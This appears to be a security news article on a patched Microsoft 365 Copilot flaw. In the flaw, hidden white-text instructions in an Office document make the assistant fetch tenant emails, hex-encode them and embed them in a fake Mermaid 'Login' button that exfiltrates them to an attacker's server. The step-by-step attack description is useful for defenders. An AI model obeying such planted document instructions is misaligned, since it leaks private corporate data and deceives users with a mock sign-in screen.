A newly discovered flaw in Microsoft 365 Copilot could let attackers trick the AI assistant into grabbing and leaking private tenant data.
Researchers found that by hiding secret instructions inside an Office document, attackers can force Copilot to fetch recent corporate emails, encode them, and package them as a malicious Mermaid diagram.
When a user clicks the diagram, the encoded emails slip out to a server controlled by the attacker.
How the Hidden Payload Works
Mermaid is a popular tool that turns simple text into diagrams like flowcharts and sequence charts.
It also supports CSS styling, which gives attackers room to hide malicious links. In this attack, the attacker crafts an Office file with two hidden pages.
The first page tells Copilot to ignore normal content. The second page embeds instructions using white text on a white background to fetch recent emails, convert them into hex strings, and split them into short lines so the diagram engine won’t break.
When a user asks Copilot to summarize the doctored file, the AI processes the hidden instructions.
Instead of giving a normal summary, Copilot:
- Runs the hidden step to retrieve recent corporate emails from the tenant.
- Transforms the email text into a single hex-encoded string.
- Generates a Mermaid “Login” node styled as a button, embedding the hex data into a hyperlink that points to an attacker’s server.
The diagram code resembles a flowchart:
textgraph LR
A[Malicious Document] -->|User asks to summarize| B[Indirect Prompt Injection]
B --> C[Fetch & Encode Emails]
C --> D[Generate Fake Login Button]
D -->|User clicks| E[Exfiltrate Data]
When the unsuspecting user clicks the fake button, a hidden iframe briefly appears, sending the encoded data to the attacker’s Burp Collaborator server.
Then Copilot shows a mock Microsoft 365 login screen to trick the user into believing they need to sign in again.
Indirect Prompt Injection Explained
Indirect prompt injection occurs when attackers hide instructions inside the content that AI systems process.
Unlike direct injection, where attackers type commands directly at the model, indirect injection uses benign-looking documents or emails that the AI trusts.
The hidden commands override the AI’s normal behavior, letting attackers steer it toward actions like data theft or code execution.
In this case, the hidden instructions in white text forced Copilot to fetch and encode emails, then embed them into a clickable diagram.
The CSS styling of the Mermaid diagram made it possible to slip malicious links past both the AI and the end user.
After responsible disclosure by security researchers, Microsoft patched Copilot to disable interactive elements like hyperlinks in generated Mermaid diagrams.
This update closes the exfiltration channel by preventing AI-created diagrams from carrying active links.
Microsoft advises all users to update their Copilot integrations immediately and to avoid asking the AI to summarize documents from untrusted sources until they have applied the latest patch.
By removing clickable links in diagrams, Microsoft has cut off a clever but dangerous trick that attackers used to turn innocent-looking diagrams into covert data exfiltration tools.
Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today
.webp?resize=1600,900&ssl=1&description=Researchers found that by hiding secret instructions inside an Office document, attackers can force Copilot to fetch recent corporate emails){kind=link}